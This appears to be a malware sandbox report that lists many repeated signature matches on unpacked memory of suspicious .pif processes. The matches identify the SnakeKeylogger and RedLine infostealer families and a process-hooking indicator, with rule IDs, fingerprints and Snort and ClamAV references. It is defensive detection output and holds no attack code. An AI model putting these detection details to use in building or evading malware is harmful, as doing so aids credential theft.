            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 21.2.Cobsfhiy.PIF.20805c08.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.1.yihfsboC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.1.yihfsboC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.EPTMAcgvNZ.exe.21ef13d8.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.1.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.1.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
